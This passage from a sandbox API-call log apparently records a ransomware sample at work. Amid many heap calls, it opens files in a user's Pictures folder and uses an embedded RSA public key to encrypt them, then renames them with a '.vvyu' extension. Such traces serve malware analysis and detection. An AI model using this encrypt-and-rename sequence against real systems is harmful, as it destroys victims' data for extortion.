(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0195.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0195.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0195.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0195.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0195.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0195.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1218 | out: hHeap=0x620000) returned 1 [0195.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0195.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.015] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x11f43, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x11f43, lpOverlapped=0x0) returned 1 [0195.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.017] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x11f48, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.017] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0195.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0195.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0195.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.018] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0195.019] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.019] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.019] CloseHandle (hObject=0x568) returned 1 [0195.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0195.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea3a68 [0195.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0195.022] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\eoTPxOdhMybXN _gV_k_.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\eotpxodhmybxn _gv_k_.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\eoTPxOdhMybXN _gV_k_.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\eotpxodhmybxn _gv_k_.jpg.vvyu")) returned 1 [0195.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0195.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.024] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0195.027] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ecac60, ftCreationTime.dwHighDateTime=0x1d8a1c1, ftLastAccessTime.dwLowDateTime=0x27d59ab0, ftLastAccessTime.dwHighDateTime=0x1d8a71d, ftLastWriteTime.dwLowDateTime=0x27d59ab0, ftLastWriteTime.dwHighDateTime=0x1d8a71d, nFileSizeHigh=0x0, nFileSizeLow=0x39c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HZvZCiMH.gif", cAlternateFileName="")) returned 1 [0195.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1218 [0195.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1218 | out: hHeap=0x620000) returned 1 [0195.028] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\HZvZCiMH.gif") returned=".gif" [0195.028] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\HZvZCiMH.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\hzvzcimh.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.028] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=14787) returned 1 [0195.028] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.031] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x399d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.031] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.034] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.034] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x39c3, lpOverlapped=0x0) returned 1 [0195.035] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.035] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.035] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.035] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.036] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.036] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.036] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.036] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.036] GetLastError () returned 0x0 [0195.036] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.036] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.037] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.037] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.037] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x39c0) returned 0x2ea3a68 [0195.037] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1218 [0195.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bd0 [0195.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1260 [0195.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2be8 [0195.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c18 [0195.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c78 [0195.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c30 [0195.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.038] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea79b0 [0195.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0195.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0195.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c78 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c30 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2c18 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0195.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0195.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0195.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.041] GetCurrentThreadId () returned 0x66c [0195.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea0460 [0195.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0195.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.042] GetCurrentThreadId () returned 0x66c [0195.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0195.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c78 [0195.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c18 [0195.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0195.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c30 [0195.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c00 [0195.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c90 [0195.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0195.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c60 [0195.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c48 [0195.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ca8 [0195.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0195.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c48 [0195.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0195.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0195.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0195.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c18 [0195.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea79b0 [0195.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0195.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea7bc0 [0195.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 